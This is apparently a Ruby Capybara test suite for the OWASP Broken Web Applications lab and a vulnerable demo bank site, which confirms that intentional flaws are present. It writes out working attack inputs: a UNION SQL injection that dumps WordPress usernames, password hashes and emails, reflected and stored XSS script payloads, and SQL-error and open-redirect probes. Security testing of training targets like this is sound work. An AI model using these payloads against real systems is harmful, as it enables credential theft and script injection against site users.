OWASP Broken Web Applications Application Vulnerability Unit Testing Capybara Test

OWASP Broken WebApps Capybara.rb

# encoding: utf-8

#http://code.google.com/p/owaspbwa/wiki/ProjectSummary
#http://sourceforge.net/apps/trac/owaspbwa/report/1

require 'capybara/rspec'

Capybara.default_driver = :selenium
Capybara.run_server = false
#page = Capybara::Session.new(:selenium)

describe 'OWASP Broken Web App: Wordpress', :type=>:request, :app=>'owasp_broken' do
	before(:all) { Capybara.app_host = 'http://owaspbwa' }
	context "Without authenticating", :type=>'authorization' do
		specify "I should be able to access the blog" do
			visit '/wordpress/'
			within('head title') do
				page.should have_content('Broken WordPress')
			end
		end
	
		specify "I should be able to access the login page" do
			visit '/wordpress/wp-login.php'
			within('head title') do
				page.should have_content('Login')
			end			
		end
		
		specify "I should not be able to access the WordPress Admin page" do
			visit '/wordpress/wp-admin/'
			within('head title') do
				page.should have_content('Login')
			end			
		end
	end
	
	context "After logging in as 'admin'," do
		before(:each) do
			visit '/wordpress/wp-login.php'
			fill_in "log", :with => "admin"
			fill_in "pwd", :with => "admin"
			click_button "submit"
		end
					
		specify "the page should list 'admin' as the authenticated user" do
			within('strong') do
				page.should have_content('admin')			
			end
		end
		
		specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do			
			visit '/wordpress/wp-admin/'			
			within('head title') do
				page.should have_content('Dashboard')
			end				
		end
		
		specify "I should be able to access the User Admin page", :type=>'authorization' do		
			visit '/wordpress/wp-admin/users.php'
			within('head title') do
				page.should have_content('Users')
			end				
		end
		
		context 'After logging out, visiting the login page, and pressing the down arrow', :type=>'autocomplete' do			
			specify "I shold see autocompleted usernames" do
				visit '/wordpress/wp-login.php'			
				fill_in 'log', :with =>''				
				find_field('log').native.send_keys(:arrow_down)
				sleep 1
				find_field('log').native.send_keys(:arrow_down)
				sleep 1
				find_field('log').native.send_keys(:return)								
				sleep 1
				content = find_field('log').value				
				content.should_not be_nil
				content.should_not eq('')
				content.length > 0	
			end
		end		
	end
	
	context "After logging in as 'user'," do
		before(:each) do
			visit '/wordpress/wp-login.php'
			fill_in "log", :with=> "user"
			fill_in "pwd", :with=> "user"
			click_button "submit"
		end
					
		specify "the page should list 'user' as the authenticated user" do
			within('strong') do
				page.should have_content('user')			
			end	
		end
		
		specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do			
			visit '/wordpress/wp-admin/'
			within('head title') do
				page.should have_content('Dashboard')
			end		
		end
		
		specify "I should be not able to access the User Admin page", :type=>'authorization' do		
			visit '/wordpress/wp-admin/users.php'			
			page.should have_content('You do not have sufficient permissions to access this page.')			
		end
	end
	
	
	context 'On the ss_load.php page,', :type=>'sqli' do
		context 'When I enter a single quote into the ss_id URL parameter,' do
			before(:all) do
				visit "/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id='"
			end
			specify 'The application should respond with an SQL error message' do
				page.should have_content("You have an error in your SQL syntax")
			end
		end
		context 'When I enter an SQL Injection Payload,' do
			before(:all) do
				visit %q|/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--|
			end
			specify "I should see the 'admin' account details" do
				within('#s1_spreadsheetBars') do
					page.should have_content('[email protected]')
				end
			end
		end
	end
end


describe 'OWASP Broken Web App: AWStats', :type=>:request, :app=>'owasp_broken' do
	
	context "When entering an XSS payload into the 'editList.php' page, ",:type=>'xss' do
		before(:all) do
			visit %q|/gtd-php/editList.php?listTitle=<script>alert('Achieved JavaScript Context')</script>|
		end
		specify 'An alert box should be displayed' do
			expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
		end
	end
	
	context "When entering an XSS payload into the 'newChecklist.php' page", :type=>'stored_xss' do
		before(:all) do
			visit '/gtd-php/newChecklist.php'
			fill_in 'title', :with => %q|"><script>alert(1)</script>|
			fill_in 'description', :with => 'asdf'
			click_button 'Add Checklist'
		end
		specify 'I should see an alert box after submitting the form' do
			expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
		end
		context "When visiting the 'listChecklist.php' page, " do
			specify 'I should see an alert box' do
				expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
			end
		end
	end	
	
	context "When visiting the 'awredir.pl' page and specifying a 'url' of 'google.com', ", :type=>'open_redirect' do
		before(:all) { visit '/awstats/awredir.pl?url=google.com' }
		specify "The browser should be redirected to 'google.com'" do
			within('head title') do
				page.should have_content('Google')
			end
		end		
	end
end


describe "Freebank", :type=>:request, :app=>'freebank' do
	before(:all) { Capybara.app_host = 'http://zero.webappsecurity.com' }	
	context 'When submitting  a single quote in the user id field of the login page,', :type=>'freebank' do
		before(:all) do			
			visit '/'
			fill_in 'login', :with=>%q|asdf'|
			fill_in 'password', :with=>'asdf'
			click_button 'Access Accounts'
		end
		specify 'I should see a database error message displayed' do		
			page.should have_content '[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression'
		end
	end
end